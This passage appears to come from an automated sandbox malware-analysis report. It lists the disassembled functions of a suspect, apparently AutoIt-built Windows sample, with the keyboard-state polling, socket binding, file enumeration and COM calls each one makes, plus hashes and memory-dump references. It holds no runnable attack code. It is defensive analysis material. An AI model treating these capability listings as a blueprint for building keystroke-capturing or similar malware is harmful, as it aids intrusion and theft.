                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 3102970594-0
                                        • Opcode ID: 0c10f8de7c3bc6d432ea8538c03a70fb36303e94f8696b0f95586628f98c4e20
                                        • Instruction ID: 541ccc4f1d0b89e8b55b687f54bed2edeaec2604a44d5f108fd58fdb49d2fde6
                                        • Opcode Fuzzy Hash: 0c10f8de7c3bc6d432ea8538c03a70fb36303e94f8696b0f95586628f98c4e20
                                        • Instruction Fuzzy Hash: AF0270716042049FDB15CF28C895E2ABBE5EF48344F18C49DF94ACB2A2DB35ED41CBA1
                                        Function 0075A54A Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 0075A572
                                        • GetAsyncKeyState.USER32(000000A0), ref: 0075A5F3
                                        • GetKeyState.USER32(000000A0), ref: 0075A60E
                                        • GetAsyncKeyState.USER32(000000A1), ref: 0075A628
                                        • GetKeyState.USER32(000000A1), ref: 0075A63D
                                        • GetAsyncKeyState.USER32(00000011), ref: 0075A655
                                        • GetKeyState.USER32(00000011), ref: 0075A667
                                        • GetAsyncKeyState.USER32(00000012), ref: 0075A67F
                                        • GetKeyState.USER32(00000012), ref: 0075A691
                                        • GetAsyncKeyState.USER32(0000005B), ref: 0075A6A9
                                        • GetKeyState.USER32(0000005B), ref: 0075A6BB
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: c5fea347080638fd1ba56944532282e8c3e48a364c4e6abb7e060dd3865e0707
                                        • Instruction ID: 34d08b091faf7dc9e16bfa5da1cce4d7b39dde329968bea724b945fda0e05626
                                        • Opcode Fuzzy Hash: c5fea347080638fd1ba56944532282e8c3e48a364c4e6abb7e060dd3865e0707
                                        • Instruction Fuzzy Hash: 3E4193745047C97EFF31466084147E5BEA0AB11346F08826ADDC64A1C1EBEC9DECCB67
                                        Function 00774089 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32 ref: 007740D1
                                        • CoUninitialize.OLE32 ref: 007740DC
                                        • CoCreateInstance.OLE32(?,00000000,00000017,00790B44,?), ref: 00774136
                                        • IIDFromString.OLE32(?,?), ref: 007741A9
                                        • VariantInit.OLEAUT32(?), ref: 00774241
                                        • VariantClear.OLEAUT32(?), ref: 00774293
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 636576611-1287834457
                                        • Opcode ID: 419dfb5ce89ad1d40f7a8de39cb4e13d99fcba2dc18f321389d2021ba5d728dc
                                        • Instruction ID: 4c876ce4e4dc6c20bb055f832a726625c56b8eef3151de819d5b6687db6deb48
                                        • Opcode Fuzzy Hash: 419dfb5ce89ad1d40f7a8de39cb4e13d99fcba2dc18f321389d2021ba5d728dc
                                        • Instruction Fuzzy Hash: 6D619070204301DFCB10EF64D849F6AB7E8BF45754F108949F9899B2A1D778ED84CB92
                                        Function 0076A488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0076A4D5
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0076A5E8
                                          • Part of subcall function 007641CE: GetInputState.USER32 ref: 00764225
                                          • Part of subcall function 007641CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007642C0
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0076A505
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0076A5D2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                        • String ID: *.*
                                        • API String ID: 1972594611-438819550
                                        • Opcode ID: 863d835dbc3bdd5a04972ef2f6799c83db9b1ce8ab2a6b42c383046074029067
                                        • Instruction ID: 5fd854cd0670ad928b387d90cf0e1a349f5d5e99090789f737e420f7d73967d4
                                        • Opcode Fuzzy Hash: 863d835dbc3bdd5a04972ef2f6799c83db9b1ce8ab2a6b42c383046074029067
                                        • Instruction Fuzzy Hash: 83414F7194020EAFCF54DFA4C849AEEBBB5FF15310F24405AE906B2191DB789E94CF62
                                        Function 006F225D Relevance: 7.8, APIs: 5, Instructions: 309COMMON
                                        Download Yara Rule
                                        APIs
                                        • DefDlgProcW.USER32(?,?), ref: 006F22EE
                                        • GetSysColor.USER32(0000000F), ref: 006F23C3
                                        • SetBkColor.GDI32(?,00000000), ref: 006F23D6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Color$Proc
                                        • String ID:
                                        • API String ID: 929743424-0
                                        • Opcode ID: d595370758fb792029164d800b4e0ef3b9496813c9d5b0f5d4c25ca671cf0ebf
                                        • Instruction ID: 56974dc7ae477154c44b2f4c9faf07357f936b4526eb577fe44fa26ba221cb62
                                        • Opcode Fuzzy Hash: d595370758fb792029164d800b4e0ef3b9496813c9d5b0f5d4c25ca671cf0ebf
                                        • Instruction Fuzzy Hash: AE81E7F124845DFEF63966798CADEBB164EDB42340F150209F342C9696CA1D9F02DA36
                                        Function 00772163 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007739AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007739D7
                                          • Part of subcall function 007739AB: _wcslen.LIBCMT ref: 007739F8
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007721BA
                                        • WSAGetLastError.WSOCK32 ref: 007721E1
                                        • bind.WSOCK32(00000000,?,00000010), ref: 00772238
                                        • WSAGetLastError.WSOCK32 ref: 00772243
                                        • closesocket.WSOCK32(00000000), ref: 00772272
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 1601658205-0
                                        • Opcode ID: 312ae314893688ea4e61703b7e76da6a0f815d87a8aa9fdf4d754ddf213abaaf
                                        • Instruction ID: de795b21a728bc9b6be2dec7c2d3649269b7b78ea82a8cb0ffde55e6a21971ab
                                        • Opcode Fuzzy Hash: 312ae314893688ea4e61703b7e76da6a0f815d87a8aa9fdf4d754ddf213abaaf
                                        • Instruction Fuzzy Hash: E151B271600204AFEB20AF64C896F2A77E6AB04754F55C09CFA199F3D3C775ED428BA1
                                        Function 007825A0 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: d61fdf9ac9c1dce87e1796a76129cbdc09cd90829339cbc537789ea2105d6057
                                        • Instruction ID: 5854b5e7f99599699d2f20267f1ef3809ce70b713bb32afa13ba2629c54d2a96
                                        • Opcode Fuzzy Hash: d61fdf9ac9c1dce87e1796a76129cbdc09cd90829339cbc537789ea2105d6057
                                        • Instruction Fuzzy Hash: 7A21F7313802409FD721AF1AC854B167BE5EF95325F18806DE849CB253EB79EC43CB94
                                        Function 0075EBE5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0075EC19
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: mouse_event
                                        • String ID: DOWN
                                        • API String ID: 2434400541-711622031
                                        • Opcode ID: 989a62c96139bd67d4080b918dcf690c969c8237ee283f18fcd7b7e69efbf611
                                        • Instruction ID: dca51f9e33614e27b15cc09e5e570c0d166566da5297de83b470c2d8bc019270
                                        • Opcode Fuzzy Hash: 989a62c96139bd67d4080b918dcf690c969c8237ee283f18fcd7b7e69efbf611
                                        • Instruction Fuzzy Hash: 14E08CA62DD7223CBE4821187C07EF7038C8F22336B614246FC41E51C0ED8D5EC661B8
                                        Function 006F24C3 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006F259A
                                        • GetSystemMetrics.USER32(00000007), ref: 006F25A2
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006F25CD
                                        • GetSystemMetrics.USER32(00000008), ref: 006F25D5
                                        • GetSystemMetrics.USER32(00000004), ref: 006F25FA
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006F2617
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006F2627
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006F265A
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006F266E
                                        • GetClientRect.USER32(00000000,000000FF), ref: 006F268C
                                        • GetStockObject.GDI32(00000011), ref: 006F26A8
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 006F26B3
                                          • Part of subcall function 006F19CD: GetCursorPos.USER32(?), ref: 006F19E1
                                          • Part of subcall function 006F19CD: ScreenToClient.USER32(00000000,?), ref: 006F19FE
                                          • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000001), ref: 006F1A23
                                          • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000002), ref: 006F1A3D
                                        • SetTimer.USER32(00000000,00000000,00000028,006F199C), ref: 006F26DA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: f8fb747cc6ce1b6a61b93f0915e23da71f28c7c502370c02bf7383cbf041125d
                                        • Instruction ID: c4bea36361c813e40c3694f571df48fc98ce90893e565156ad627dd97d22133e
                                        • Opcode Fuzzy Hash: f8fb747cc6ce1b6a61b93f0915e23da71f28c7c502370c02bf7383cbf041125d
                                        • Instruction Fuzzy Hash: 16B18C71A0020ADFDB24DFA8CC59BAE3BB5FB48314F108119FA15A72D1DB78A941CF55
                                        Function 00788C9B Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 00788CB9
                                        • _wcslen.LIBCMT ref: 00788CCD
                                        • _wcslen.LIBCMT ref: 00788CF0
                                        • _wcslen.LIBCMT ref: 00788D13
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00788D51
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00783F79,?), ref: 00788DAD
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00788DE6
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00788E29
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00788E60
                                        • FreeLibrary.KERNEL32(?), ref: 00788E6C
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00788E7C
                                        • DestroyIcon.USER32(?), ref: 00788E8B
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00788EA8
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00788EB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                        • String ID: .dll$.exe$.icl$y?x
                                        • API String ID: 799131459-1772520864
                                        • Opcode ID: 6a291a61bae350c9aba540ca3535705993cf2017f6efa4981575b0242accf3fe
                                        • Instruction ID: 29207d7b8fc8c365b85fc315f7d9c1ef7f5538e794ee10626eb7759a729d93f3
                                        • Opcode Fuzzy Hash: 6a291a61bae350c9aba540ca3535705993cf2017f6efa4981575b0242accf3fe
                                        • Instruction Fuzzy Hash: 0D61CF71680219FEEB64EF64DC45BBE77A8BB08710F508606F915D61D1DB789E80CBA0
                                        Function 007647D3 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 00764852
                                        • _wcslen.LIBCMT ref: 0076485D
                                        • _wcslen.LIBCMT ref: 007648B4
                                        • _wcslen.LIBCMT ref: 007648F2
                                        • GetDriveTypeW.KERNEL32(?), ref: 00764930
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00764978
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007649B3
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007649E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 1839972693-4113822522
                                        • Opcode ID: 9d22ffeff64f5d7304a44ee010625604d490b8650f5d8a2cb41f4149e293772b
                                        • Instruction ID: e41e725464653b38aa9a7278d00ad54bb0804b9631e32ca2e3238fd2987ba297
                                        • Opcode Fuzzy Hash: 9d22ffeff64f5d7304a44ee010625604d490b8650f5d8a2cb41f4149e293772b
                                        • Instruction Fuzzy Hash: 4471D0725083069FC750EF28C8809BBBBE5EF94754F10492CF896972A1EB38ED45CB95
                                        Function 007562AA Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 007562BD
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007562CF
                                        • SetWindowTextW.USER32(?,?), ref: 007562E6
                                        • GetDlgItem.USER32(?,000003EA), ref: 007562FB
                                        • SetWindowTextW.USER32(00000000,?), ref: 00756301
                                        • GetDlgItem.USER32(?,000003E9), ref: 00756311
                                        • SetWindowTextW.USER32(00000000,?), ref: 00756317
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00756338
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00756352
                                        • GetWindowRect.USER32(?,?), ref: 0075635B
                                        • _wcslen.LIBCMT ref: 007563C2
                                        • SetWindowTextW.USER32(?,?), ref: 007563FE
                                        • GetDesktopWindow.USER32 ref: 00756404
                                        • GetWindowRect.USER32(00000000), ref: 0075640B
                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00756462
                                        • GetClientRect.USER32(?,?), ref: 0075646F
                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00756494
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007564BE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                        • String ID:
                                        • API String ID: 895679908-0
                                        • Opcode ID: a268f93713115ce19d319fa9480dec7ec2ccb74da9f813c11ca7956039a28f5f
                                        • Instruction ID: 6d8fd5bbd88f478ab63890d8758643c48b6b2e83dfca47b8ad51d24d36c7ffaa
                                        • Opcode Fuzzy Hash: a268f93713115ce19d319fa9480dec7ec2ccb74da9f813c11ca7956039a28f5f
                                        • Instruction Fuzzy Hash: 15718D31A00709AFDB20DFA8CE49AAEBBF5FF48705F504518E946A31A0D7B8ED45CB50
                                        Function 0077076B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00770784
                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0077078F
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0077079A
                                        • LoadCursorW.USER32(00000000,00007F03), ref: 007707A5
                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 007707B0
                                        • LoadCursorW.USER32(00000000,00007F01), ref: 007707BB
                                        • LoadCursorW.USER32(00000000,00007F81), ref: 007707C6
                                        • LoadCursorW.USER32(00000000,00007F88), ref: 007707D1
                                        • LoadCursorW.USER32(00000000,00007F80), ref: 007707DC
                                        • LoadCursorW.USER32(00000000,00007F86), ref: 007707E7
                                        • LoadCursorW.USER32(00000000,00007F83), ref: 007707F2
                                        • LoadCursorW.USER32(00000000,00007F85), ref: 007707FD
                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00770808
                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00770813
                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0077081E
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00770829
                                        • GetCursorInfo.USER32(?), ref: 00770839
                                        • GetLastError.KERNEL32 ref: 0077087B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Cursor$Load$ErrorInfoLast
                                        • String ID:
                                        • API String ID: 3215588206-0
                                        • Opcode ID: 94da389823d3c954e74ee4c6a16dcb2e193dcc701765061eb42146df6f3ec161
                                        • Instruction ID: 2ae627c3bbdf51d539e10fa898d012230ef07410cab250b78f4791ebf9f58834
                                        • Opcode Fuzzy Hash: 94da389823d3c954e74ee4c6a16dcb2e193dcc701765061eb42146df6f3ec161
                                        • Instruction Fuzzy Hash: 6B4177B0D48319AADB10DFBA8C8586EBFE8FF04354B50852AE11CE7291D778E901CF91
                                        Function 00710456 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                        Download Yara Rule
                                        APIs
                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00710456
                                          • Part of subcall function 0071047D: InitializeCriticalSectionAndSpinCount.KERNEL32(007C170C,00000FA0,CCB2BAFC,?,?,?,?,00732753,000000FF), ref: 007104AC
                                          • Part of subcall function 0071047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00732753,000000FF), ref: 007104B7
                                          • Part of subcall function 0071047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00732753,000000FF), ref: 007104C8
                                          • Part of subcall function 0071047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007104DE
                                          • Part of subcall function 0071047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007104EC
                                          • Part of subcall function 0071047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007104FA
                                          • Part of subcall function 0071047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00710525
                                          • Part of subcall function 0071047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00710530
                                        • ___scrt_fastfail.LIBCMT ref: 00710477
                                          • Part of subcall function 00710433: __onexit.LIBCMT ref: 00710439
                                        Strings
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 007104B2
                                        • kernel32.dll, xrefs: 007104C3
                                        • InitializeConditionVariable, xrefs: 007104D8
                                        • SleepConditionVariableCS, xrefs: 007104E4
                                        • WakeAllConditionVariable, xrefs: 007104F2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
